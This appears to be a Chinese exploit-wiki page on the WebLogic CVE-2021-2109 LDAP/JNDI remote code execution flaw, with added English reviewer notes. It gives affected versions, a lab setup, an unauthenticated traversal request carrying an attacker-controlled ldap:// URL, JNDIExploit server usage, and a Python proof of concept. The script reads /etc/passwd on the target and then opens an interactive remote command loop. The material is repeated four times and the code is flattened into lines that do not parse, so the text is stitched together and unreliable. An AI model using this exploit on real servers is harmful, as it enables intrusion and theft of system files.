# Weblogic LDAP 遠程代碼執行漏洞 CVE-2021-2109
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果該頁面在未授權的情況下可以訪問，且版本在影響範圍內，則可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
# CVE-2021-2109 proof-of-concept exactly as published on the page; the code below is kept verbatim.
# What the script does, as written:
#   - title(): prints a usage banner.
#   - POC_1()/POC_2(): build a GET to
#     <target>/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true
#       &JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22<ldap_url>/Basic/WeblogicEcho;AdminServer%22)
#     and send it with a "cmd" request header, verify=False (TLS certificate checks disabled) and a
#     5-second timeout. POC_1 treats "root:" in the response body as success and calls sys.exit(0)
#     otherwise; POC_2 prints the response and is called in a loop until the user types "exit".
#   - __main__: the first request sends cmd="cat /etc/passwd" unconditionally, so although the page
#     text says the POC only checks for unauthenticated access, running it executes a command on the
#     target and then opens an interactive command loop.
#   - Errors are caught by a broad `except Exception` and only printed; `re` and
#     InsecureRequestWarning are imported but never used.
# Defender notes (derived from the request the script constructs):
#   - The path carries a double-URL-encoded traversal (`%252e%252e`) to reach consolejndi.portal
#     without authentication, and the JNDIBindingPortlethandle parameter embeds a caller-controlled
#     ldap:// URL (with ";" as the third separator, see the page text). Per the page's setup the
#     WebLogic host is expected to connect out to that LDAP address (port 1389 in the example).
#     Both are observable: access-log / WAF matching on the `%252e%252e` + `consolejndi.portal`
#     pattern and on `JndiBindingHandle(` containing `ldap://`, and egress monitoring for
#     unexpected LDAP connections originating from the WebLogic host.
#   - NOTE(review): the durable fix is the vendor patch for CVE-2021-2109, together with
#     restricting console exposure and outbound connections from the server — confirm against
#     Oracle's advisory.
# NOTE(review): the line break that splits the string literal "...响应为:\n{} " across the two lines
# below looks like an extraction artifact; as shown here the file does not parse.
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} 
\033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果該頁面在未授權的情況下可以訪問，且版本在影響範圍內，則可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
# CVE-2021-2109 proof-of-concept exactly as published on the page; the code below is kept verbatim.
# What the script does, as written:
#   - title(): prints a usage banner.
#   - POC_1()/POC_2(): build a GET to
#     <target>/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true
#       &JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22<ldap_url>/Basic/WeblogicEcho;AdminServer%22)
#     and send it with a "cmd" request header, verify=False (TLS certificate checks disabled) and a
#     5-second timeout. POC_1 treats "root:" in the response body as success and calls sys.exit(0)
#     otherwise; POC_2 prints the response and is called in a loop until the user types "exit".
#   - __main__: the first request sends cmd="cat /etc/passwd" unconditionally, so although the page
#     text says the POC only checks for unauthenticated access, running it executes a command on the
#     target and then opens an interactive command loop.
#   - Errors are caught by a broad `except Exception` and only printed; `re` and
#     InsecureRequestWarning are imported but never used.
# Defender notes (derived from the request the script constructs):
#   - The path carries a double-URL-encoded traversal (`%252e%252e`) to reach consolejndi.portal
#     without authentication, and the JNDIBindingPortlethandle parameter embeds a caller-controlled
#     ldap:// URL (with ";" as the third separator, see the page text). Per the page's setup the
#     WebLogic host is expected to connect out to that LDAP address (port 1389 in the example).
#     Both are observable: access-log / WAF matching on the `%252e%252e` + `consolejndi.portal`
#     pattern and on `JndiBindingHandle(` containing `ldap://`, and egress monitoring for
#     unexpected LDAP connections originating from the WebLogic host.
#   - NOTE(review): the durable fix is the vendor patch for CVE-2021-2109, together with
#     restricting console exposure and outbound connections from the server — confirm against
#     Oracle's advisory.
# NOTE(review): the line break that splits the string literal "...响应为:\n{} " across the two lines
# below looks like an extraction artifact; as shown here the file does not parse.
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} 
\033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果該頁面在未授權的情況下可以訪問，且版本在影響範圍內，則可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
# CVE-2021-2109 proof-of-concept exactly as published on the page; the code below is kept verbatim.
# What the script does, as written:
#   - title(): prints a usage banner.
#   - POC_1()/POC_2(): build a GET to
#     <target>/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true
#       &JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22<ldap_url>/Basic/WeblogicEcho;AdminServer%22)
#     and send it with a "cmd" request header, verify=False (TLS certificate checks disabled) and a
#     5-second timeout. POC_1 treats "root:" in the response body as success and calls sys.exit(0)
#     otherwise; POC_2 prints the response and is called in a loop until the user types "exit".
#   - __main__: the first request sends cmd="cat /etc/passwd" unconditionally, so although the page
#     text says the POC only checks for unauthenticated access, running it executes a command on the
#     target and then opens an interactive command loop.
#   - Errors are caught by a broad `except Exception` and only printed; `re` and
#     InsecureRequestWarning are imported but never used.
# Defender notes (derived from the request the script constructs):
#   - The path carries a double-URL-encoded traversal (`%252e%252e`) to reach consolejndi.portal
#     without authentication, and the JNDIBindingPortlethandle parameter embeds a caller-controlled
#     ldap:// URL (with ";" as the third separator, see the page text). Per the page's setup the
#     WebLogic host is expected to connect out to that LDAP address (port 1389 in the example).
#     Both are observable: access-log / WAF matching on the `%252e%252e` + `consolejndi.portal`
#     pattern and on `JndiBindingHandle(` containing `ldap://`, and egress monitoring for
#     unexpected LDAP connections originating from the WebLogic host.
#   - NOTE(review): the durable fix is the vendor patch for CVE-2021-2109, together with
#     restricting console exposure and outbound connections from the server — confirm against
#     Oracle's advisory.
# NOTE(review): the line break that splits the string literal "...响应为:\n{} " across the two lines
# below looks like an extraction artifact; as shown here the file does not parse.
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} 
\033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==參考==
https://mp.weixin.qq.com/s/P6xTm3Ww4llbbd9CIm9spQ
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果該頁面在未授權的情況下可以訪問，且版本在影響範圍內，則可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
# CVE-2021-2109 proof-of-concept exactly as published on the page; the code below is kept verbatim.
# What the script does, as written:
#   - title(): prints a usage banner.
#   - POC_1()/POC_2(): build a GET to
#     <target>/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true
#       &JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22<ldap_url>/Basic/WeblogicEcho;AdminServer%22)
#     and send it with a "cmd" request header, verify=False (TLS certificate checks disabled) and a
#     5-second timeout. POC_1 treats "root:" in the response body as success and calls sys.exit(0)
#     otherwise; POC_2 prints the response and is called in a loop until the user types "exit".
#   - __main__: the first request sends cmd="cat /etc/passwd" unconditionally, so although the page
#     text says the POC only checks for unauthenticated access, running it executes a command on the
#     target and then opens an interactive command loop.
#   - Errors are caught by a broad `except Exception` and only printed; `re` and
#     InsecureRequestWarning are imported but never used.
# Defender notes (derived from the request the script constructs):
#   - The path carries a double-URL-encoded traversal (`%252e%252e`) to reach consolejndi.portal
#     without authentication, and the JNDIBindingPortlethandle parameter embeds a caller-controlled
#     ldap:// URL (with ";" as the third separator, see the page text). Per the page's setup the
#     WebLogic host is expected to connect out to that LDAP address (port 1389 in the example).
#     Both are observable: access-log / WAF matching on the `%252e%252e` + `consolejndi.portal`
#     pattern and on `JndiBindingHandle(` containing `ldap://`, and egress monitoring for
#     unexpected LDAP connections originating from the WebLogic host.
#   - NOTE(review): the durable fix is the vendor patch for CVE-2021-2109, together with
#     restricting console exposure and outbound connections from the server — confirm against
#     Oracle's advisory.
# NOTE(review): the line break that splits the string literal "...响应为:\n{} " across the two lines
# below looks like an extraction artifact; as shown here the file does not parse.
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} 
\033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==參考==
https://mp.weixin.qq.com/s/P6xTm3Ww4llbbd9CIm9spQ